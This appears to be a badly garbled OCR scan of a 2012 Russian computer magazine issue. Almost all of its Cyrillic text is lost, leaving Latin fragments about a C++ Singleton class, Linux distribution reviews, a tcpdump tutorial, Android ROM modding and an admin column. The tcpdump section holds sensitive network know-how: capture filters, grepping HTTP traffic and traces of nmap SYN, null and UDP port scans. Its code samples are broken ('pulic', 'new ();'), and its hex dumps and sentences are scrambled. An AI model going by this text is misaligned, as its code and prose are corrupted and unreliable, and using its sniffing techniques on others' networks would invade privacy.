Windows,
use
mode
- ,
. ,
, ini-
. , ,
,
Save,
. , ,
-
,
-
, ,
,
?
,
.
.
.
, ,-
,
gSettings,
. CSettigs .
, ,
, .
.
.
,
, Sigleto.
,
, .
098
class CSettings
{
pulic :
01/156/2012
11
--
~s.;:~~ . . ,....
f>.
csettings gsettings;
,. ,_,..,...,.
'''
....;.-:::::..::.;-
-,
~~~~
CSettings gSettings. , , ,
_, .... ..;.
, n n n
. ,
...... .._..........,
, , gSeetings
. . . . . .. . -(1
01
n . -,
n
CSingleton;
gSettings, ,
class CSettings
n ,
.
, n
. n
. -, CSettings, ,
private :
CSettings ();
static CSettings* m_instance;
puic :
n, ,
gSettings
. ,
{
i f (m_instance == )
m_instance = new CSettings();
return m_instance;
, , n .
- :
static
.
11 . . .
class csettings
{
/1
pulic :
-~};
// ...
/1
/1
= ;
CSettings
CSettings: :getinstance()->getSettings();
CSettings: :getSettings();
, , CSettings
n
, , .
, new.
- -
, , . ,
.
getlnstance[].
CSettings
m_i nstance, ,
n - .
, ,
. , 100 % - ,
ini-. ,
, , -
n ,
CSettings , CSettings
, n
n .
n, ,
] .
n <<>> . ,
. n
, <<
. ,
>> . .
, n .
CSingleto,
, ++
,
. , pivate ,
getlstance[], .
,
, . n
[ ,
], , -
01 / 156/ 201 2
099
getlnstance
~
. . ..
.;)
--
~ tt
~~
- -
n. n n.
-
..'/1'1 .. _
...._
--- --
.....-.....
( n }
CSingleton
template <class >
class CSingleton
,._,
w-.,. -u
static
tJ _ _ _
..
I J _ .. _..,, _ _
--------_...
....
puic :
,.,_ .._
tt,_,. .. c
,,,_.....
_.. _,_,
... ..- ..
,,~
,.,...
getinstance()
if (m_instance == )
m_instance = new ();
return m_instance;
-._..
-- - -~--~
~
...
...
t J-~I.Joo
,,,,_... ,...
,.,"_.,_.!_
1 1 1 _.... >1'
Wikipedia
protected :
CSingleton() {};
static * m_instance;
};
11 CSettings
class CSettings : puic CSingleton<CSettings>
getlnstance.
CSettings. ,
n ,
NQ 1
m_instance
, ,
CSettings , .
NQ 2, getlnstance,
, , m_instance.
NQ1, ,
CSettings ,
m_instance.
private :
CSettings ();
protected :
friend class CSingleton<CSettings>;
public :
static void getSettings() { ... };
11---
n.
, , ,
.
, . ++
n ,
getlnstance
CSingleton
n . -
I- .
Windows
CSingleton,
, :
, , ,
CSettings
n-n n,
n n
n, ++ fiend,
puic :
new.
CSingleton
n n >>.
. 00-
EnterCriticalSection( ... );
. ,
, CSingleto
if (m_instance == )
m_instance = new ();
, .
CSigleton, .
LeaveCriticalSection( ... );
return m_instance;
protected :
CSingleton() {};
static * m_instance;
};
,
CSettings,
toa
, .
ton :
s;"p to}
+ SW\etan ge!ONL\'()
Sing)eton ge!ONLYQ {
:ONLYnull) ONLY
rttuznONLY;
}
w Sing)etor();
<< >>
. , , ,
, .
100
, -. ::
01 / 156/201 2
2012
21:21
liECnATHD
n
zxz
--------~--------
UNIXOID
LINUX
,
Sabayon n
Sabayon emege
> ,
.config Calculate
Linux
1560 ,
- 866,
Sabayon
- 2625 1250
equo,
Calculate
Linux
ntoo,
, ,
:
.
,
( US
l, , >>
.
Sabayon 7
: s.g
:
GPL
Linux Mint
i686,
86_64
: l tel P etium
S - Getoo ,
D istowat c h.co m .
PCLinuxOS
Faio E c u li ani . ,
64.
no , Mageia
Mandiva .
Gentoo
, .
Gentoo.
5.4
Seve B as e ~ :, .
102
01/ 156/20 12
>> ,
Sabayon
, .
,
6 /etc/make.cof
. ,
, ,
.
make.conf
Liv-
. (
]. Anaconda,
. ,
. , ,
,
.
, ,
man].
Sabayon
, ,
. ,
wid-,
4:3
SpinBase:
GNOME;
: XFce, LXOE, Enlightenmet SpinBase/
OpeVZ ( OpenVZ].
: ,
GNOME
, t
.
.
,
SpinBase
ATI NVidia]
. :
(Fiuxbox] . 4.1
Molecule.
DAILY .
. . ,
( isohybid] .
Gentoo,
Potage,
. ,
Sabayon
. .cofig
866,
Sabayon
Sabayon
2625
1560 ,
1250
].
,
/etc/skel
Entopy. , , ,
Getoo ,
.
equo:
,
,
Gentoo
CL.
mc
# equo install
14 ],
equo , , ,
apt-get: ,
, ,
smt- ( ],
.
Magneto
Stoe eqL!O ( Magneto]. Stoe
DISTROWATCH.COM
06.11.2011]
( ;. ] ,
: i .
(U S -, " , . .] ,
r
Potage. : emege ,
- . ,
,
equo
.
, , ,
Sabayon
01 / 156/2012
Ca lculate Linu x (
1. Mint
2. Ubuntu
3. Fedora
4. Oeian
5. openSUSE
6. Arch
7. PCLinuxOS
8. CentOS
9. Puppy
10. Mandriva
2155
2108
1686
1318
1290
1222
1032
916
866
708
11. Mageia
12. Lu buntu
13. Scien tific
14. Zorin
15. Slackwae
16. Chakra
17. Sabayon
18. FreeBSD
19. Bodhi
20. Gentoo
627
612
575
563
563
563
557
490
478
453
],
103
UNIXOID
REDHAT/FEDORA SLACKWARE
: i686, 86_64
RAM, 4-6
. ,
n n
, .
Linux
CetOS , , ,
RedHat
: ICDS- Diectoy
F e doa
Sv) - [C LO) -
, ,
<< .
j, , . .) . ,
[ f u duntu.o g ] Ubuntu,
. ,
F e doa.
, .
RedHat [ , CentOS]
Yellow Dog Linux [yel lowdog linux.com ]. ,
, ,
w S.
( .
. , >>
Vectolinux [w ww.
Gentoo, IR-
vecto linux.com ], ;
Zenwalk [ zenwalk.og ] ,
hadened/seliux-epc.
100% Gentoo [ - Gentoo)
, CL n .
n
Calculate 2[
) . , n cl-install,
1/va/li/Iayman/calculate/pofiles/patches ) , , ,
, , ,
, n
n n
Gub .
n- ,
n , n n
n. n
/va/calculate/linux cl - instal l.
Cho mium 05 , , .
, n Sabayon.
11.0 , ,
Sabayon,
n, ,
~.~ ~
n [ ) . CL
equo,
lot~l
Oioltlof.
J~IIc:
~coeollnoRc:
emege,
, , << vs >>.
, n n
[ ).
u:I'01
n S.:
Proyctpltp:
j tpO.renon.ntt
NPctpltp:
[ *>>) .
cl-instlll
-disk/dtY/sdo~2:/:et4
--set
os_insto~ll_ll_dto_drvfglrx
Gentoo. CL
- n, , US- .
n uild-
Calculate Linux n n
01/156/2012
50% ] .
2.32.
'Jo411WHIIHn!r.~
'J fl!.}(i~lf ~I t JI
XFce, Fluxbox
: V - [
1<>.
!Jfln<J~r
, ], - - [ ].
n
nolll)'kr. ...poelfiT~
], .
\1
-~ ..
-,
~~~.:'
n.I
JJU: ......, .
'71
1\f~~...
~;r.:.~~
Windows
,':~.~~
~~~~~
~~==
"
~~t
,:::.
~'::.:
Zorin OS 5.1
: zo i n-os.com
HI)'IIM
nporpi!MI'I~t-
0~::.-:.::
&:'=.':.
6SIN~C-~
GPL
i386, 86_64
lntel Pentium 11 ,512 RAM, 6
Kenel2.6.38, Glibc 2.13, Udev 167, .g 1.10.1 , GNO ME 2.32 .2,
L ibeOffice.O g 3.3 .3.1
0 Ntnu gl !
1~'*1
Liu x Mi t
Ubuntu
Ubuntu,
Windows.
[ GnoMenu, , ,
] Wi n7.
UBUNTU
, .
, . ,
Nautilus-Eiementay
Gloobus Pe v iew,
Apple Quicklook.
, Softwae Cente .
Zoin
linuxmint .com
: GPL
: i386, 86_64
: lntel Pentium 11, 512 RAM, 4
Kenel2 . 6.38 - 8, Glibc 2.13, Udev 167, .g 1.10.1, GNOME 2.32 .1,
LibeOffice.Og 3.3 .2
n Ubu ntu, ,
, Linux. n [
05 Look
Cha n ge
,
,
Win7, WinXP
Ubuntu.
-lntenet ws Manage - n
- [ Chome].
PlayOnlinux
ZOS
Wine
Windowsn Ubu ntu.
Wineticks, n n
npopa .
, - [
] n Oistowatch.com,
n],
-n n. >>
Multimedia, Gaming] .
Ubuntu, LS- [3.1].
Clement
Lefebve.
n - n ,
[n n ].
n Windows-ce.
n ,
Ubuntu,
100 %.
, ,
Ubu ntu,
. n
, . , n ,
n : >>.
, , ,
Ubuntu
Softwa e Cente,
n , .
, -
[c ommun i ty . linuxmint.com/softwae ].
mintUpdate
: , n
, << >>.
Ubuntu,
L S -
LMOE, Oebian
Gnome XFce Rollig
elease. LMOE [201109].
GNOM E [
01 /156/2012
Zor i
05
Win7
105
UNIXOID
n
n , , .
n,
. n, n
PCLinuxOS Magazine,
CAEiinux, TinyMe ZEN-minil.
IKaoshi,
Mageia 1
: mageia.og/u/
:
Po~sh
Port~se(t;1lfl
Portuquese
GPL
i586, 86_64
lntel Pentium 11, 512 RAM, 6
Kenel3.0.4, Glibc 2.12.1, Udev 173, . g 1.10.4, GNOME 2.32 .1,
4.7.4, L ibeOffice.Og 3.4.3
( Portug~11
PunjaI
Romanlan
Russi
, -
2010.
Mandiva, .
,
PCLinuxOS
Mandiva, ,
addlocale
MANDRIVA
, Mandiva
, , n
, , . ,
Mageia
PCLinuxOS
2011 Desktop
pclinuxos.com
GPL
: i586
: lntel Pentium 11, 512 RAM, 3
Kenel2.6.38.8, Glibc 2.11.2, Udev 168, . g 1.10.4, GNOME 2.32.1,
4.6.4
:
161
20
. -, 32-
GNOME.
IEuopa
150,
21. V-
32-,
64- . .
Mageia n Mandiva .
Mageia Li ve ,
. ,
2003 Mandake
! Mandival. Radically Simple .
n :
, ,
>> .
, Liv-.
. n
Cente, Mandiva . n
2007 PCLinuxOS
Mandiva .
Mageia
Contol
Rpmdake.
Mandiva
. n
, mageia.og/en/1/migate . :::t:
Mageia 1.
-,
n n.
n , LibeOffice
.
URPM
PCLinuxOS
, n n
Synaptic.
n n , n
k, n n : , .
n , n-
ZOS
WINE
PLAYONLINUX
106
WINETRICKS
Mageia Mandriva,
01 /156/2012
le xec it . rul
TCPDUMP
UNI-
.
,
tcpdump.
Linux
SD- , ,
I:I:J:Itl:ll!lli
tcpdump-
, ,
.
,
tcpdump
25
UNJX.
UNJ-
Windows
li bpcap,
tcpdump.
tc pdump,
,
.
107
UNIXOID
[raot~hast
tcpdu~:
vebose
ou tput
s up pess ed ,
use -v
- vv
~.&.~la n B -
f
fu l l
decode
potocol
1ist ening ~o~lanB , lt nk - type EH1BI13 ( Ethernet J, capture slze 65535 bytes
16 :22 :41 .348 185 IP 1 92. 1 68 . .1 1 . 418 > 192 . 168 .8 . 1.53 : 49244+ ? . u . ( 23J
16 :22 :41 .345182 IP 192.168 .8.1 .53 > 192 . 168. . 11.461 : 49244 /2/3 213.188 .284 .3, 77.88.21.
3, 87 . 258 .258.3 , 87 . 258.258.283 , 87.258 . 251.3 , 93.158.1 34.3 , 93 . 15.134.2 , 213.188.
193.3 !254 )
16 :22 :41 .345381 IP
>
192.168. . 11 .376:
63342+
ya .ru . !23)
63342 812/3
213.188.193 .3 ,
213 . 188.2
87 .258.258 . 215 ,
11 packets ecei ve d fl lt e
packets dropped kenel
[ r- oot@~host x_unixold_tcpdumpHI
DNS -anpoc
tcpdump ,
?
. :
- , tcpdump
[ !:
flags - .
5 (SYN), F (FIN), (PUSH)
tcpdump
R (RST),
> s udo
2 packe t s
2 packets
captued
ece i ve d fllte
DNS-anpoc
data-seqno - n ,
first:last, first last-
n
n
nbytes.
, tcpdump
, ' -':
t [ , tcpd ump
! ,
:
# tcpdump -i wlane
-n
# tcpdump -i wlane - 1 -n - \
host 192.168.0.1 and port 80
, , .
-' I - DNS-.
,
:
,
, .
# tcpdump -i wlane
d port 53
- 1
-n host 192.168.0.1 \
, tcpdump, ,
-v'. IP
I- :
DNS-apoc tcpdump.
192.168.0.1 . ?
16:22:41.340105-
- , .
[TOSI , [ LI ,
,
[ facl.
, , [,
UDP, ICMP) .
IP, ,
. , ,
. tcpdump
tcpdump, .
, host t,
, ,
tcpdump DNS- -
, ?
?>>, .u,
/I- 23
# tcpdump -i wlane
- n src 192.168.0.1
. - .
,
dst,
. ,
d:
[8/2/31 [
108
01 /156/2012
GREP
tcp dum p
TCPDUMP
tcp dump:
i []- ,
.
g,
, .
, ,
POST
GE T
-,
n- I - DN S- .
nn- 1 - .
- th t- .
# g re p
- 1 -q - d eth e
t cp and port se
" G
J s
v, -vv, -vvv -
" \
!, , ! .
[n] -
s[n] - , !
-w
!.
byl i ne \
5- -
! sequece u mbes l.
- t h t- .
q- ! ! .
S - :
- I s - .
, SS
DN S - . ! ! exce pt lel.
SY N ! - ] ,
:
, tc pdum p :
#
#
tc pdump - i wlane
- 1
. SY N .
tcpdump -i wlane
, . ,
:
#
#
tcpdum p :
tc pd ump -
/ I .
tcpdump,
: p oto[exp:size], t - , -
, size- ,
! 1
] . , -
1 ,
tc pdump
- ,
nm ap. , nm ap
192.168.0.100
15 : 49 :38 . 719422 IP 192.168 . . 1 . 596 24 > 19 2. 168 . . 111 . 8888: Flags [5 ], seq 1 36557188, win 32792 , options [mss 1
+6396.sackOK.T5 val 94976812 e.nop . wscale 5], length
15 : 49 :38 .719425 IP 192.168. . 111.8888 > 192. 168 . . 1.5962 4: Flags [R.J. seq . ack 136557189, win , length
15 : 49 :38 .719435 IP 192.168. . 1 . 54946 > 192.168 . 0.111.587 : Flags [5], s eq 2921975 2 1. win 32792 . options [mss 16
+396,sackOK,T5 val 9497681 2 e.nop . wsca le 5J, length
15 : 49 :38 .719438 IP 192.168 . . 111 . 587 > 192 . 168 . 0 . 1 . 54946 : Flags [R.J . s eq . ack 2 9219752 2 . win . length 0
15 : 49 :38.719449 IP 192 . 168.0.100 . 43337 > 192. 168 . 0.111. 22 : Flags [5 ], seq 2610 24 277 . win 32792 . options [mss 163
+96 , sackOK.T5 val 94976812 0,nop,wscale 5J, length
15 : 49 :38 .719457 IP 192 . 168 . . 111 . 22 > 192.168..100.433 37: Flags [5. ] , seq 349677 23 9. ac k 261 24278, win 32768,
+ options [mss 16396,sackOK,T5 val 94976812 94976812 .nop.wscale 5] , length 0
15 : 49 :38 .719463 IP 192 . 168 . .100.43337 > 192 . 168 . . 111.22 : Flags [ . J. ack 1. win 1025, options [nop,nop,T5 val 94
+976812 94976812], length
15 : 49:38.719883 IP 192.168 . . 10 . 4887 > 192 . 168.0 . 110.111: Flags [5 ], seq 472646806 , win 32792 . options [mss 16
+396.sackOK.T5 val 94976812 e,nop,wscale 5J, length 0
1. -
01 /156/2012
109
UNIXOID
16:30:16.611690 IP 192.168.0.100.48585 > 192.168.0.111.135: Flags [5], seq 1679394613. win 4096, options [mss 146
+0], length 0
16:30:16.611700 IP 192.168.0.111.135 > 192.168.0.100.48585: Flags [R.]. seq 0, ack 1679394614. win 0. length 0
16:30:16.611715 IP 192.168.0.100.48585 > 192.168.0.111.8080: Flags [5], seq 1679394613. win 3072, options [mss 14
+60]. length 0
16:30:16.611724 IP 192.168.0.111.8080 > 192.168.0.100.48585: Flags [R . J. seq 0, ack 1679394614. win 0. length 0
16:30:16.611738 IP 192.168.0.100.48585 > 192 . 168.0.111 . 23: Flags [5], seq 1679394613. win 2048. options [mss 1460
+ ]. length 0
16:30:16.611748 IP 192 .168.0.1 11 .23 > 192.168.0.100.48585: Flags [R .], seq 0, ack 1679394614, win 0, length 0
16:30:16.611763 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [5], seq 1679394613, win 4096. options [mss 1460
+ ], length 0
16:30:16.611789 IP 192.168.0.111 . 22 > 192.168 . 0.100.48585: Flags [5 . ], seq 625029896. ack 1679394614. win 32792.
+options [mss 16396], length 0
16:30:16.611798 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [R], seq 1679394614. win 0, length 0
16:30:16.611816 IP 192.168.0.100.48585 > 192.168.0.111.111: Flags [5], seq 1679394613. win 1024, options [mss 146
+0], length 0
2. SN-
- ,
, -
SYN-nae (5 ). 8888,
, , ,
RST-nae. ,
, .
- , -
587
. ,
nmap
SYN-nae
192.168..111.22:
ack
>
192.168..1.48585
Flags (5],
192.168..111.22 :
...
>
192.168..111.22
349677239,
>
tcpdump
2.
192.168..1.43337 :
26124278,
192.168..1.43337
>
192.168..111.22:
nmap
seq
.. .
62529896,
, ,
RST-nae, .
SYN-ACK,
: , -,
, .
UD-. :
, ,
UD- ,
, n .
3
nmap
. ,
ICMP
uneachae:
, n
. , ,
,
nmap,
16 : 41 : 48.79831
, .
SN-
(nmap -sS). -
IP
192.168..1.612
192.168..111.18869:
16:41:48.798346 IP
192.168..1
UDP, length
192.168..111
>
>
192.168 . .1:
unreachale,
ICMP
length 36
.
- ull-,
R-
(nmap -sN).
, .
,
Linux
RS-:
-, tv.adobe.com, n
,
RTMP .
tcpdump .
win
R- ,
192.168. . 111.256
192.168..1.39132
372,
length
>
Flags (],
192.168..111.256:
>
Flags (R.],
192.168..1.39132:
ms-
):
tmpdump (l kc l. net/tmp )
192.168..1.35331
flv- :
seq
$ ./rtmpdump -r 'URL'
seq
399895961,
win
192.168..111.5544
- .flv
ack
>
192.168..111.5544:
496,
>
urg
length
Flags (FPU],
192.168..1.35331:
Flags [R.],
399895962
, . -
110
01/156/2012
16:~1:~8.798310
16:~1:~8 . 7983~6
16:~1:~8.798371
16:~1:~8.79838~
16:~1:~8.798~00
16:~1:~8 . 798~12
16:~1:~8 . 798~29
16:~1:~8.798~~1
16:~1:~8.798~56
16:~1:~8.798~67
16:~1:~8.798~83
16:~1:~8.798~95
16:~1:~8.798510
16:~1:~8 . 798522
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
IP
18869
unreachale,
length 36
31335
unreachale,
length 36
50919
unreachale,
length 36
5~11~ unreachale,
length 36
5971
unreachale,
19663
length 36
unreachale ,
length 36
1950~ unreachale,
length 36
3. UD-
1-sA) tcpdump
17:48:58 .999718 IP 192.168...43949 > 173.19<:1.32. 18.00: Flags IP.J, seq 1835416245:1835417611, ack
~o~ln 557. opt lons [nop,~QJJ,TS val 9697~96 7652175631, Jength 1366
8000:
4SEIB BSSa
979
exeete:
adc2 2812
t B22d
oose
z:
RST. , ,
nmap ,
. tcpdump
7469
d0 4361
296d 6178
2d41 6765
352 3028
7838 365f
~9 742f
<:
0:
8:
> 192.168.0.111 :
6578 2d61
52d 4 f 74
2dl
6765
2858 3131
3634 2920
3533 352
7920
6557 6562
4854 4d4c
6f 2920 4368
3833 S2 3230
3335 231 d
7874 2 f68 746d
696f 2f 7868
7 6963 6174
32 392 2a2f
6363 6570 742d
67 6970 264
d i141 6363
6765 2 S
238 d<'I 4163
6574 320 4953
7466 2d38 71
2 469 75
417 70
312 284)
23 71d 32 38d 84 1
Oxe l S:
01 6:
8170:
018:
6566 l 7465
6570 742d 4:1
2d55 532 S
6365 7!f74 2d43
4f2d 3539
8:.<8190:
exetao:
69 7665
726f 3
Bd0a 5573 6572
6368
8140:
08 1 00:
f 320 S
110:
0 1 2:
138:
Oxe8f8:
I~MP
2d9c
86 s7 64
?:
d:
ete t
890:
ed8c
850:
, , I-
29
0065
8)(8830:
ftx8840:
88
d s 731
273 6463
7 7561
71 d
861 7273
2d1 275
3878972.
... . ~.IJ . .
.. Pf: .. l ..
og l e.com .. Comec
t lon: .keep-allve
.. Cache-Contro l :
.max-age=B .. User
-Agent: . oz l llat
5 . 8. : .Ltnux .
86_4) .Rpplei-Jeb
Klt/S35. 1 .CKHTL
, . llke.Gecko) .Ch
011t 1 4 . .35 .2
2.5ataltSS.I ..
Rccept: . text/htr~
l ,app l lcatlon/xh
tml+xlll.appllcat
l ontxl:Q=8.9 . /
google.com tcpdump
, ,
.
I-
. ! , SYN)
, ,
tcpdump ,
. ,
Cisco
.
,
tcpdump
1 \
Wieshak:
,
wireshark -k -i -
'-w
Wieshak ,
St:
, -:
/etc/sort/snort.conf
-r -
g,
,
l:i!:Ii
tcpdump
,
, .
01 / 156/2 012
,
. :::
111
ANDROID-POWBKY
l'' .,
Andoid
,
'
____
_ ...J
goo.g!I!IHRo
fa mewo k- es . ap k.
goo .gi/vz8
Andoid .
goo.gi/Ya!IX
n .
goo.gi/P6JR
IBM .
goo.g!lsGXwa
Andoid
L~nux,
Honeycomb.
Android :~~~~: ~
~: _ ,
, .
,
Andoid ..,..
.
ndid- ! '
Andold ,
2.
3.
~
~
n ~ ~ ~
. , ,
' .
3
~
11
META-IN F,
boot.img
system.
,
,
, ,
NND- ,
- ,
.
boot.img ,
Linu x initd.
/. ,
,
BFS
NFS,
xda-developes
ClockwokMod.
,
system -
, .
Andoid
Linux.
, .
:
- : , ,
. .
xda-developes
dalvikvm.
t- . /t Linux,
, , .
Andoid /data/data.
fonts- .
, ,
C l ockwokMod ,
framework- Jv- ,
lo , ,
did- . famewok-es.apk,
][J.
, , ,
lib- L inu - ,
. ,
, .
?
l, libss l .
- , ,
xda - developes . com.
media- :
iOS, Windows
Andoid. ,
, ,
tts- , .
F oums
usr-
. Andoid
, in. ,
Development
/ us/shae.
I ROM] >>. -
CyanogenMod,
2.3 Rom>>
, ,
!, , !.
vndr- , .
f im wae <<
>> ,
xbln -
Wi-Fi.
, ,
, , -
in . ,
, ltop,
ROM
unzip:
!. CyanogenMod
:
busybox
bash, ss h, powetop,
. .
build.prop- a, ,
.
/system/ap p
, , ,
. ,
Andoid, ,
, << >> . ,
NND- .
, Andoid l ADWLaunche
CyanogenModl . ,
LauncherPro lwww.launcherpro.com l:
Andoid ,
,
rm system/app/Launc her.apk
wget goo.gl/U9c54 - system/app/LauncherPro.apk
. ,
SETPROP
, n n -
. , Andoid
n. .
build . pop n
n setpop:
n n n
# setprop debug.sf.nobootanimation 1
n n n n
!n, i ,
. , n
Diale
One
Phone.apk
sms.apk.
Linu-n, n
cepepa
mc?
Google,
ssh-
n.
Andoid n
Go SMS
ARM
n n
NDK
. n, n
mc
n.
xda-developes n n n
Midnight
Commande. n k-n
lgoo.gi/Pax1 Hl n n
layout XML l
AXML, apktool n XMLI.
n,
, , .
xda-developes, n
Andoid.
<<famewok-es
mod
_>>.
famewok-es.apk ,
unzip:
, famewok-es
diff:
n k-n
la , n
apk, n n n lnstalll.
n n n n
$ diff -R -/framework-res \
-/rom/system/framework/framework-res
,
famewok-es,
mc:
$ cd -/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet
famewok-es.apk
mc.
zi- n
aapt
apktool.
Andoid
SDK,
apktool
k-.
:
ClockwokMod Recovey. ,
-/oml n uzip.
Andoid .
$ cd -/rom/system/framework
$ java -jar -/apktool.jar framework-res
n Andoid, , .
Andoid famewok/
framwork-res/dist/framework-res.apk
$ rm -rf framework-res
11
famewok-es . apk .
- .
apktool:
ng-,
cd -; wget goo.gl/hxzSl
tar -xjf apktool1 . 4.1.tar.bz2
cd -/rom/system/framework
java -jar -/apktool.jar d framework-res.apk
system/
media/bootanimation .zip. :
$ cd /tmp
$ mkdir bootanimation; cd bootanimation
famewok-es, .
- s/dw-* es/layout-*
ng-
. , dawae
land-mdpi-
l n n n
!. ,
, &
&
ANDROID
# system.prop
#
f geeric
sdk
wifi . interface
= tiwlanB
#
#
suppoted
this device.
.o .o pengles .vesion
FPS 241:
n . n
.
, ,-
.
Android
system/build . pop,
n .
,
Andoid, .
.
ClockworkMod Recovery:
Android
1.
ro.HOME_APP_ADJ=l
$ unzip -/rom/system/media/bootanimation.zip
desc.txt,
n n:
n
n n
n .
FPS
n.
2.
JG-:
ro.media.enc.jpeg.quality=lee
4Se see
1 parte
partl
,
n .
480
800,
3.
IFPSI 30 / .
n
:
n n ,
t. n ! 1 n
pl. lpatll n
, n n . t
debug.sf.nobootanimation;l
4.
GPU:
, n ,
t- , n
debug.sf.hw=l
. ,
n,
. .
n ,
n .
5. !n n
n n USBI:
. n
ng- n mencode l
desc.txt
persist.adb.notify=e
> cd /rom/system/framework/
> java - jar /apktool. jar d framework-res . apk
wifi.supplicant_scan_interval=180
pm.sleep_mode=l
1 Loading resource t ,, .
1 Loaded .
1 Decoding fi le-resources ...
1 Decoding values*l* XMLs , ..
1 Done .
1 Copying assets and libs ...
> 1s fra111ework-res
Andro idMan i fest. xml apktoo 1 . yml assets
> ls framework-res/res /
values-es
anim
va 1ues-es-rES
color
values-fa
drawae
drawae-en-ldpi
values-fa-r!R
drawae-en-mdpi
values-fi
values-fi-rFI
drawae- land-ldpi
drawae-land-mdpi
values-fr
values-fr-rBE
drawae-ldpi
va lues-fr-rCA
drawae-mdpi
drawa e-nodp i
va lues-fr-rCH
layout
values-fr-rFR
va l ues-he-r 1L
layout-land
values-hi-r i N
layout-port
values-hr
raw
ro.ril.disae.power.collapse=e
3.
res
va lues-mcc23B-ko
va lues-mcc23B-n l
va l ues-mcc23B-p l
va lues-mcc23B-pt
va lues-mcc23B-pt-rPT
va 1ues-mcc23B-ru
va lues-mcc23B-sv
va lues-mcc23B-tr
va 1ues-mcc23B-zh-rCN
va lues-mcc23B-zh-rT'"
va l ues-mcc232
va l ues-mcc232-cs
va l ues-mcc232-da
va l ues-mcc232-de
1 j1m
3 j1m
dw--
dw-- 13 j1m
> 1s -1 system
u 48
dw--
2 j1m
dw--
2 j1m
1 j1m
dw-- 13 j1m
dw--
2 j1m
dw--
2 j1m
dw--
7 j1m
dw--
3 j1m
dw--
3 j1m
dw--
7 j1m
dw--
3 j1m
dw--
2 j1m
-w-----
ro.ril.enae.dtm=l
ro.ril.hsdpa.category=10
ro.ril.enale.aS=l
ro.ril.enale.g.prefix=l
ro.ril.htcmaskwl.bitmask=4294967295
ro.ril.htcmaskwl=l4449
ro.ril.hsupa.category=S
4.
1904
-w-----
net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize .wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960
framework-res.apk
> 1s -1
u
G-:
uses
uses
uses
1941504
4095
4095
.
HOSi .
.
system/
build.pop .
ll*'lk
, , -
uses
uses
uses
uses
uses
uses
uses
uses
uses
uses
uses
uses
>1
4095
4096
3598
4095
4095
4095
4095
4095
4095
4095
4095
4095
HOSi.
HOSi.
.
HOSi.
HOSi.
HOSi,
HOSi.
8
8
29
8
8
10
8
HOSi.
HOSI.
8
8
8
8
HOSi.
HOSi.
HOSi .
15:33
15:33
2008
15 :33
15:33
17:15
15:33
15:33
15 :33
15:33
15:33
15 :33
bin
bui1d.pop
etc
fonts
famewok
1ib
media
tts
us
vendo
xbin
testsign .
zip:
, Recovey
:
$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip
m y -om-siged.zip
.
6.
R e covey,
!.
ro.lge.proximity.delay=25
mot.proximity.delay=25
Wipe
l Reco v ey <Ente>J,
7.
Yes
<Ente> .
fom sdcad ,
Yes.
system now .
<<Reboot
l:l!:lel!tj
Adoid- ,
1.
debug.performance.tuning=l
video.accelerate.hw=l
windowsmgr.max_events_per_sec=150
, ,
,
2.
1/etc/init.dl,
. :::
11
Ubuntu 11.10
UBUNTU 11.10
Oneiic Ocelot [ )- 15- Linu- Canonical.
V- [
Unity.
-,
1,5 ),
>>.
!
>> ).
Linux kenel3.0.1;
Launche.
Unity 4.12.0 n
Compiz 0.9.6;
GNOME3.2;
no n
Mozilla Fiefox 7.0.1, Mozil la
Thudebld 7.0.1, LightDM,
Oeja Oup,
- Gwibbe;
LibeOffice
EJ
Uity
, >>
. ,
,
: ,
, ,
5.0
, ,
Cente
OneConf,
n
U
<Ai t+Tab>.
-
, .
Qt Unity 20,
OpeGL. Uity
>>. ,
01/156/2012
<<
l ud -
, ,
!
Ubuntu, . .) Softwae
Banshee
Google Oocs)
Rhyth mbox
, ,
, .
Lenses,
LoCo
Ubutu
Lauche.
ARM.
R- .
1111
3.4.2;
Python 3.2, GCC4.6.1, Bash4.2, CUPS 1.5.0,
Pidgin 2.10.0, UOEV 173, .g 1.10.4;
Unity 30,
Qt
20
Qt Quick.
Unity 20
Canonical
n
20 13 .
Ubuntu 12.04,
2012 , LS-,
n .
117
SYN/ACK
aka 13oz
qscentr.ru -
n GSPD
n
.
,
- .
- ,
[ ),
. ,
, .
.
118
01/156/2012
rn
, - ),
. -,
[ -I . <<
9) , ,
, ,
. ,
:
NQ687
781.
1) ,
. ,
, - ,
- .
? ,
11
, ,
, ,
21
111 , ,
[ - l .
, ,
, :
<<, , >>.
( )-
, 2 [ ) , ,
,
, ,
, , , etc.
12)
[ )
31
- ,
, . ,
, . ,
<< n
(I- ,
. :1
, ,
, ,
. -
. ,
,
58 .
, - ,
etcl, ,
[ ) .
[
) .
13)
- ,
.
41 - ,
, !
- ,
, ,
. ,
, .
, .
141 - ,
, .
51
- .
l - ,
, , ,
[ )
- ,
. ?
, , ,
, - ,
- , ,
:1
, .
16) -
. ,
,
, :
. ? , .
, [ /) ,
- . ,
[ u , ,
I, ~
), -
L; , ,
[ ) .
[ / l
'> [ ).
71
151
: /
61
- .
17) -
. ,
, , l
, ,
. ~
. ,
- , ,
. .
8) - .
: ,
, , !
,
. , , ,
, ,
, .
181
- ,
.
01/156/2012
119
SYN\ACK
19) - ,
?
, ,
. .
<<. ,
, [ , ,
1- . ) - ,
. , -
.. << - ?
, , ,
. .
- : ,
- .
[ ) .
- 90 .
:1
, ,
, -
, [
ISPDN. RU -
) .
20) - ,
. ,
, , ,
. , -
- << >>.
,
,
- -.
, [
, << >>
<< >>- ,
),
. ,
. , ,
, ,- - ,
. ::
?
n :
- , <<
11 - ,
8) -
,
>>,
, ,
, ,
, . .
etc).
9)
2)
-
152-, .
3)
, -
, ,
4)
152-.
10)
, ,
, ,
- )
6)
11)
5)
- :
120
- ,
[ ) .
7)
,
-
, ,
,
.
, -
, <<
. ,
. . ,
,-
,- ,
01/156/2012
181
, - ,
,
- ?
, - ,
- 2;
. ,
-1.
- ,
. ,
181
( !,
2 -
. ,
,
.
181
.
,
r.1
1.;.1
.
. ,
.
r.1
- .
1.;.1 ,
- ?
, , , ,
. .
181
181
, -
VLAN'a
01/156/2012
121
SYN/ACK
